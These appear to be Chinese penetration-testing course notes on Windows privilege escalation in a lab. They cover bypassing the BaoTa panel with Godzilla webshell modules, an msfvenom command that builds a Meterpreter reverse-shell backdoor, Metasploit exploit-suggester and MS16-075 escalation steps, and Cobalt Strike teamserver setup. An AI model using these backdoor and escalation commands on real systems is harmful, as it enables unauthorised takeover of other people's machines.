第132天:windows权限提升篇&溢出漏洞&宝塔面板Bypass&CS插件化&MSF模块化

image-20250908153223110

image-20250908153240866

1、具体有哪些权限需要我们了解掌握的:

1
2
3
4
5
6
7
后台权限
数据库权限
Web权限
计算机用户权限
计算机系统权限
宿主机权限
域控制器权限

2、以上常见权限获取方法简要归类说明:

1
2
3
4
5
6
7
后台权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成
数据库权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成
Web权限:RCE,反序列化,文件上传等直达或通过后台数据库间接造成
计算机用户权限:弱口令,数据泄漏等直达或通过Web,服务器及域控转移造成
计算机系统权限:系统内核漏洞,钓鱼后门攻击,主机软件安全直达或上述权限提升造成
宿主机权限:Docker不安全配置或漏洞权限提升直达(服务资产造成入口后提升)
域控制器权限:内网域计算机用户提升或自身内核漏洞,后门攻击,主机软件安全直达

3、以上常见权限获取后能操作的具体事情:

1
2
3
4
5
6
7
后台权限:文章管理,站点管理,模版管理,数据管理,上传管理等
数据库权限:操作数据库的权限,数据增删改查等(以数据库用户为主)
Web权限:源码查看,源码文件增删改查,磁盘文件文件夹查看(以权限配置为主)
计算机用户权限:就如同自己电脑上普通用户能操作的情况(敏感操作会被禁止)
计算机系统权限:就如同自己电脑上能操作的情况(整个系统都是你的)
宿主机权限:就如同自己电脑上能操作的情况(整个系统都是你的)
域控制器权限:就如同自己电脑上能操作的情况(整个内网域系统都是你的)

4、以上常见权限在实战中的应用场景介绍:

1
2
3
4
5
6
当我们通过弱口令进入到应用后台管理
当我们下载备份文件获取到数据库信息
当我们通过漏洞拿到资产系统的Web权限
当我们在公司被给予账号密码登录计算机或系统
当我们在公司或钓鱼后门获取到某个公司机器系统
.....................................

一、演示案例-Web到Win-系统提权-平台&语言&用户

1、Web搭建平台差异

1
2
3
4
5
6
7
8
9
10
11
集成软件,自行搭建,虚拟化等

集成软件:
宝塔,PhpStudy,XAMMP
如果使用集成软件搭建的网站被人拿下,那么别人拿到的权限就是运行集成软件当前用户的权限,一般都是administrator,由于使用宝塔的人多了,现在通过宝塔搭建的网站拿到webshell后,宝塔自身安全策略会导致有些命令执行不了的情况。但是phpstudy、xammp则不会存在这个问题

自行搭建:
自己一个个下载安装搭建配置(拿到的权限一般都比较低,因为这是自身容器权限,例如iis等)

虚拟化:
Docker,ESXi,QEMU,Hyper-V等(需要逃逸)

2、Web语言权限差异

1
2
ASP/ASP.NET/PHP/JSP等
权限高低:JSP>ASP.NET>ASP=PHP

3、系统用户权限差异

windows

1
2
3
4
5
6
7
8
9
10
11
System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。
Administrators:管理员组,具有对计算机进行完全访问和操作的权限。
Users:用户组,一般用户的默认组别,拥有较低的系统权限。
Guests:访客组,可以访问计算机上的公共文件夹和打印机,但不能更改配置和安装程序。
Backup Operators:备份操作员组,允许用户备份和还原数据,但不能更改配置安装程序。
Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。
Remote Desktop Users:远程桌面用户组,允许用户进行远程桌面连接。
Network Configuration Operators:网络配置操作员组,允许用户管理网络配置。
Performance Log Users:性能日志用户组,允许用户收集性能日志和计数器数据。
Distributed COM Users:分布式 COM 用户组,允许用户使用分布式 COM 连接到计算机。
IIS_IUSRS: 用于授权IIS相关服务的用户组。

linux

1
2
3
系统用户:UID(0-999)
普通用户:UID(1000-*)
root用户:UID为0,拥有系统的完全控制权限

二、演示案例-Web到Win-系统提权-宝塔安全策略绕过-哥斯拉

集成软件搭建+Windows 2012(宝塔Apache+PHP)-宝塔安全策略绕过

image-20250908153421768

image-20250908153439583

image-20250908154335299

哥斯拉模块-PMeterpreter(反弹shell到msf)

image-20250908154357612

image-20250908154412903

哥斯拉模块-BypassOpenBaseDir(绕过目录限制)

image-20250908154434651

image-20250908154448814

哥斯拉模块-BypassDisableFunction(绕过命令限制)

image-20250908154503391

三、演示案例-Web到Win-系统提权-溢出漏洞-MSF&CS

自行搭建+Windows 2008(IIS+ASP)+MSF

image-20250908155507081

1
2
3
4
5
6
7
8
9
#生成msf后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.131 LPORT=4444 -f exe -o msf.exe


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
run

筛选EXP模块

1
2
3
use post/multi/recon/local_exploit_suggester
set showdescription true
set session x

image-20250908171523227

1
2
3
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
run

image-20250908171957122

MSF—Ubantu安装

1
2
3
4
5
6
7
8
sudo apt update
sudo apt install -y curl gnupg2
curl https://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add -
echo "deb https://apt.metasploit.com/ lucid main" | sudo tee /etc/apt/sources.list.d/metasploit-framework.list
sudo apt update
sudo apt install -y metasploit-framework
sudo msfdb init
msfconsole

若添加仓库时出现密钥错误,可尝试手动下载密钥并添加:

1
2
wget https://apt.metasploit.com/metasploit-framework.gpg.key
sudo apt-key add metasploit-framework.gpg.key

定期更新 MSF:sudo apt upgrade -y metasploit-framework,非 root 用户使用时,部分功能可能需要sudo权限

自行搭建+Windows 2016(IIS+ASP.NET)+CS

CobaltStrike的使用

服务端:

1
2
3
4
./teamserver 10.20.0.22 yatming
nohup ./teamserver 10.20.0.22 yatming > /dev/null 2>&1 & #这种写法是隐藏在后台
#10.20.0.22是服务端ip,yatming是客户端链接服务端密码
#如果执行不了,就说明权限没给够,要么就是java环境不对,一般是这两种情况

客户端:

image-20250909181337151

然后输入对应的ip和密码就行,至于name随意

扩展插件

image-20250909181451595

image-20250909181504497

找到下图的cna后缀的插件。

image-20250909181425777

image-20250909181619784

生成后门:

image-20250909182001035

使用CS的插件进行提权

image-20250909182819904

image-20250909182742812

提权成功:

image-20250909182836021

第二种:

image-20250909182924545

image-20250909182936257